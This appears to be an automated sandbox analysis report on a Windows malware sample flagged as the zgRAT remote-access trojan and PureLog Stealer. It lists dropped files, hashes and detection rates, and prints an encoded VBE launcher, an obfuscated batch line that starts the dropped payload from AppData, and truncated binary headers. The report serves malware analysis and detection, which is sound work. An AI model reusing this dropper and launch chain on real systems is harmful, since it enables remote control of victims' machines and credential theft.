                                                                        Preview:f9PW2HZ9q3KqhdvceHxWTdGoYWEfis322pqzxbGmHcY383vAjWpdfQEC2l7fC3b8ARx2x6pDBKO1EMqflE6MDZWmkn6LdkjNAa3qG3NmqlcUBN7q5c487P5k4KRJAdkakB0oT9Zs0Tfb7BlWpQQAqlPvfSv5lEmNBCu9XTW5DMHoudn2j4duNjt9vEJANdGwrSa4Rl9W3U7edlBBp3Wqk1AcSuOSKWsjFV6cCsl75G12lPfJDHVUHZL0R8mgXqMgmXYIpj86SYvdAH0CPEPDBXcqJGKEFEkP4UPN1XeeIYCsnrzJIkRSbIfP5s8jY40Oygjp2mL1kv5mVtCcQA6fwRxwzASIY5FNhy4HIKRfZasqN23MpgSY7Vbgsxz2UCcoprEhy5TFsaGVjHi

                                                                        C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):250
                                                                        Entropy (8bit):5.884569940385019
                                                                        Encrypted:false
                                                                        SSDEEP:6:GhwqK+NkLzWbHnPv7qK+NkLzWHzS1DIEZAdFxbk/ibs:G0MCzWLnP/MCzWTSlIE6dFJgi4
                                                                        MD5:AE6A0A68EBDA4FDADE2D5CBC8D021167
                                                                        SHA1:0BA547A388B43ACC2267773889F806C94400E47B
                                                                        SHA-256:26572387D0A9326F703F2465D689EF201A6F794184BBB59197484E69FA62D49D
                                                                        SHA-512:F5A65856E6FA2022914BB6566D715ED13897AB74695FA6C1CAD9012F27C07349746FBB7E381D79CF3D79A393568730D55F36DF26285729520B613757D382F3F8
                                                                        Malicious:true
                                                                        Preview:#@~^4QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~r])wa9mYCuz4Xw.DUnD7+.AMWAd.DtKdYsWxbOGDJzhxrMdCt\C!q91y4/i!qx{XFLOH7KIn/nV5Wn2;x 4mYE~,!S~6lVkn80kAAA==^#~@.

                                                                        C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..

                                                                        C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):126
                                                                        Entropy (8bit):4.912026001342963
                                                                        Encrypted:false
                                                                        SSDEEP:3:EtAi2KAyAzsUVnNqXcLxKLlMveKAXjGO7An:EtAi2APEdLxKLCQFAn
                                                                        MD5:FB0B04A6974BEDA6423AF39A98AEA748
                                                                        SHA1:2521E0560A9867C3857BFD6444B0177A3C726339
                                                                        SHA-256:11407A3EFF987EB89A4FC8CA6AAA5C7A92B1A3959E3ADF29DA6CFD9AA2684298
                                                                        SHA-512:3F4A39D4E631C1CFA6D37C95C72F701252BBDAEBEC06D126104DB093351083D3743E0B3DB1DCCC7E2770636B1FF73CDBBF60419FB7B3B8539A2CBFDE800B466D
                                                                        Malicious:false
                                                                        Preview:%PmcUxzK%%mpebQjujJfB%..%tbIrQjeiwmBIHOc%"%AppData%\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"%oJjknPh%

                                                                        C:\Users\user\Desktop\AXpVrZKc.log

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):33792
                                                                        Entropy (8bit):5.541771649974822
                                                                        Encrypted:false
                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\EZcCRmIO.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):85504
                                                                        Entropy (8bit):5.8769270258874755
                                                                        Encrypted:false
                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                        C:\Users\user\Desktop\KRFbuSND.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23552
                                                                        Entropy (8bit):5.519109060441589
                                                                        Encrypted:false
                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\MjEjEgzx.log

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23552
                                                                        Entropy (8bit):5.519109060441589
                                                                        Encrypted:false
                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\VVwrSJqk.log

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):85504
                                                                        Entropy (8bit):5.8769270258874755
                                                                        Encrypted:false
                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                        C:\Users\user\Desktop\cYVGOFtR.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):33792
                                                                        Entropy (8bit):5.541771649974822
                                                                        Encrypted:false
                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\iczfvMBI.log

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32256
                                                                        Entropy (8bit):5.631194486392901
                                                                        Encrypted:false
                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\kCewxyIz.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):5.645950918301459
                                                                        Encrypted:false
                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\kKNOcijE.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32256
                                                                        Entropy (8bit):5.631194486392901
                                                                        Encrypted:false
                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\kwtgfRAG.log

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):5.645950918301459
                                                                        Encrypted:false
                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                        C:\Users\user\Desktop\ufMwPuFo.log

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):5.932541123129161
                                                                        Encrypted:false
                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                        C:\Users\user\Desktop\vqImhKDh.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):5.932541123129161
                                                                        Encrypted:false
                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        \Device\Null

                                                                        Download File
                                                                        Process:C:\Windows\System32\w32tm.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):151
                                                                        Entropy (8bit):4.843346679571959
                                                                        Encrypted:false
                                                                        SSDEEP:3:VLV993J+miJWEoJ8FXDfHLMQf2fHJGKvow0XXKvj:Vx993DEU2LRIJG1ZX8
                                                                        MD5:47A7D42F8F6D551AC36D304CE0CC43D5
                                                                        SHA1:13C248C87DA51B9EBEC60F0BA0A6C858ACAB2634
                                                                        SHA-256:3ABA836BB7650C3FA12A0C9FC54BF5B64026A27764EF33566CF5B55DDB68468A
                                                                        SHA-512:26F6FD8675D7AC565672251EF9C54DF5AE1DCCBFB633AF5341A7F0B5C21A6A90CE4397F08DC6675C27ABD37F5C8E33DA364E810A91C1165A17C7824AEB696525
                                                                        Malicious:false
                                                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 28/12/2024 15:45:57..15:45:57, error: 0x80072746.15:46:02, error: 0x80072746.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.5000926558660215
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:ZZ2sTsJFrt.exe
                                                                        File size:2'330'001 bytes
                                                                        MD5:403138422d8da9fdd31fe147959a1403
                                                                        SHA1:913139b08964bc2039eeeea9f491c5c8507b7dcc
                                                                        SHA256:4b1a5d38d7741fea74f2cf45d5b215955ba9fe117d6f6a0e7ecbef64118c449b
                                                                        SHA512:3aec241bc828aa7878a632e9e44e3c7daf982e4c412efc499c40e04b88d48b9c2c62e01f00b014ea57148623d022e8c96a3d240b67df5045b746c4b0198e9afb
                                                                        SSDEEP:49152:IBJ7Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczTG:ypDzKehnMhtXY6rZYcG
                                                                        TLSH:9DB5BF1675A24E72C3A41B335657023D42A0E7223D66EF0B375F2196AD17BF18E722B3
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                        File Icon

                                                                        Icon Hash:1515d4d4442f2d2d

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x41f530
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
